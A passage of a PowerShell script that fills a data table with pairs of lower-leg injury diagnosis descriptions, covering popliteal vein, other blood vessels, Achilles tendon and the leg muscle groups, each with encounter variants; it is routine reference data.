lesser saphenous vein at lower leg level, unspecified leg","Other specified injury of lesser saphenous vein at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, right leg","Unspecified injury of popliteal vein, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, right leg","Unspecified injury of popliteal vein, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, right leg","Unspecified injury of popliteal vein, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, left leg","Unspecified injury of popliteal vein, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, left leg","Unspecified injury of popliteal vein, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, left leg","Unspecified injury of popliteal vein, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, unspecified leg","Unspecified injury of popliteal vein, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, unspecified leg","Unspecified injury of popliteal vein, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal vein, unspecified leg","Unspecified injury of popliteal vein, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, right leg","Laceration of popliteal vein, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, right leg","Laceration of popliteal vein, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, right leg","Laceration of popliteal vein, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, left leg","Laceration of popliteal vein, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, left leg","Laceration of popliteal vein, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, left leg","Laceration of popliteal vein, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, unspecified leg","Laceration of popliteal vein, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, unspecified leg","Laceration of popliteal vein, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal vein, unspecified leg","Laceration of popliteal vein, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, right leg","Other specified injury of popliteal vein, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, right leg","Other specified injury of popliteal vein, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, right leg","Other specified injury of popliteal vein, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, left leg","Other specified injury of popliteal vein, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, left leg","Other specified injury of popliteal vein, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, left leg","Other specified injury of popliteal vein, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, unspecified leg","Other specified injury of popliteal vein, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, unspecified leg","Other specified injury of popliteal vein, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal vein, unspecified leg","Other specified injury of popliteal vein, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, right leg","Unspecified injury of other blood vessels at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, right leg","Unspecified injury of other blood vessels at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, right leg","Unspecified injury of other blood vessels at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, left leg","Unspecified injury of other blood vessels at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, left leg","Unspecified injury of other blood vessels at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, left leg","Unspecified injury of other blood vessels at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, unspecified leg","Unspecified injury of other blood vessels at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, unspecified leg","Unspecified injury of other blood vessels at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other blood vessels at lower leg level, unspecified leg","Unspecified injury of other blood vessels at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, right leg","Laceration of other blood vessels at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, right leg","Laceration of other blood vessels at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, right leg","Laceration of other blood vessels at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, left leg","Laceration of other blood vessels at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, left leg","Laceration of other blood vessels at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, left leg","Laceration of other blood vessels at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, unspecified leg","Laceration of other blood vessels at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, unspecified leg","Laceration of other blood vessels at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other blood vessels at lower leg level, unspecified leg","Laceration of other blood vessels at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, right leg","Other specified injury of other blood vessels at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, right leg","Other specified injury of other blood vessels at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, right leg","Other specified injury of other blood vessels at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, left leg","Other specified injury of other blood vessels at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, left leg","Other specified injury of other blood vessels at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, left leg","Other specified injury of other blood vessels at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, unspecified leg","Other specified injury of other blood vessels at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, unspecified leg","Other specified injury of other blood vessels at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of other blood vessels at lower leg level, unspecified leg","Other specified injury of other blood vessels at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, right leg","Unspecified injury of unspecified blood vessel at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, right leg","Unspecified injury of unspecified blood vessel at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, right leg","Unspecified injury of unspecified blood vessel at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, left leg","Unspecified injury of unspecified blood vessel at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, left leg","Unspecified injury of unspecified blood vessel at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, left leg","Unspecified injury of unspecified blood vessel at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, unspecified leg","Unspecified injury of unspecified blood vessel at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, unspecified leg","Unspecified injury of unspecified blood vessel at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified blood vessel at lower leg level, unspecified leg","Unspecified injury of unspecified blood vessel at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, right leg","Laceration of unspecified blood vessel at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, right leg","Laceration of unspecified blood vessel at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, right leg","Laceration of unspecified blood vessel at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, left leg","Laceration of unspecified blood vessel at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, left leg","Laceration of unspecified blood vessel at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, left leg","Laceration of unspecified blood vessel at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, unspecified leg","Laceration of unspecified blood vessel at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, unspecified leg","Laceration of unspecified blood vessel at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified blood vessel at lower leg level, unspecified leg","Laceration of unspecified blood vessel at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, right leg","Other specified injury of unspecified blood vessel at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, right leg","Other specified injury of unspecified blood vessel at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, right leg","Other specified injury of unspecified blood vessel at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, left leg","Other specified injury of unspecified blood vessel at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, left leg","Other specified injury of unspecified blood vessel at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, left leg","Other specified injury of unspecified blood vessel at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, unspecified leg","Other specified injury of unspecified blood vessel at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, unspecified leg","Other specified injury of unspecified blood vessel at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified blood vessel at lower leg level, unspecified leg","Other specified injury of unspecified blood vessel at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right Achilles tendon","Unspecified injury of right Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right Achilles tendon","Unspecified injury of right Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right Achilles tendon","Unspecified injury of right Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left Achilles tendon","Unspecified injury of left Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left Achilles tendon","Unspecified injury of left Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left Achilles tendon","Unspecified injury of left Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified Achilles tendon","Unspecified injury of unspecified Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified Achilles tendon","Unspecified injury of unspecified Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified Achilles tendon","Unspecified injury of unspecified Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Strain of right Achilles tendon","Strain of right Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of right Achilles tendon","Strain of right Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of right Achilles tendon","Strain of right Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Strain of left Achilles tendon","Strain of left Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of left Achilles tendon","Strain of left Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of left Achilles tendon","Strain of left Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified Achilles tendon","Strain of unspecified Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified Achilles tendon","Strain of unspecified Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified Achilles tendon","Strain of unspecified Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of right Achilles tendon","Laceration of right Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right Achilles tendon","Laceration of right Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right Achilles tendon","Laceration of right Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of left Achilles tendon","Laceration of left Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left Achilles tendon","Laceration of left Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left Achilles tendon","Laceration of left Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified Achilles tendon","Laceration of unspecified Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified Achilles tendon","Laceration of unspecified Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified Achilles tendon","Laceration of unspecified Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right Achilles tendon","Other specified injury of right Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right Achilles tendon","Other specified injury of right Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right Achilles tendon","Other specified injury of right Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left Achilles tendon","Other specified injury of left Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left Achilles tendon","Other specified injury of left Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left Achilles tendon","Other specified injury of left Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified Achilles tendon","Other specified injury of unspecified Achilles tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified Achilles tendon","Other specified injury of unspecified Achilles tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified Achilles tendon","Other specified injury of unspecified Achilles tendon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Unspecified injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Strain of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Laceration of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg","Other injury of other muscle(s) and tendon(s) of posterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Unspecified injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Strain of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg","Laceration of muscle(s) and tendon(s) of anterior muscle group at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg","Other injury of muscle(s) and tendon(s) of anterior muscle group at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle(s) and tendon(s) of anterior 